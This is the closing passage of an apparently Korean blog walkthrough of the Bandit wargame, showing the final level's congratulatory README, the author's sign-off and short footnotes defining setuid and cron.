drwxr-xr-x 70 root     root     4096 Apr 23 18:05 ..
-rw-------  1 bandit33 bandit33  430 Apr 23 18:04 README.txt

bandit33@bandit:~$ cat README.txt
****

[Next Level]
Congratulations on solving the last level of this game! At this moment, there are no more levels to play in this game.

However, we are constantly working on new levels and will most likely expand this game with more levels soon. Keep an eye out for an announcement on our usual communication channels! In the meantime, you could play some of our other wargames.

If you have an idea for an awesome new level, please let us know!

Explanation(Keyword)
수고하셨습니다. 이 글이 도움이 되길 바라며 끝~!
추가로 문제가 업뎃 되었다면 알려주세요

설정된 파일은 실행 시에 일시적으로 파일의 소유자의 권한을 사용하여 실행되는 것 [본문으로]
리눅스 및 유닉스 기반 시스템에서 일정한 시간 간격으로 반복적으로 작업을 실행하도록 예약하는 시스템 스케줄링 도구 [본문으로]
리눅스 및 유닉스 기반 시스템에서 일정한 시간 간격으로 반복적으로 작업을 실행하도록 예약하는 시스템 스케줄링 도구 [본문으로]
리눅스 및 유닉스 기반 시스템에서 일정한 시간 간격으로 반복적으로 작업을 실행하도록 예약하는 시스템 스케줄링 도구 [본문으로]
실행 프로세스 [본문으로]

저작자표시 비영리 변경금지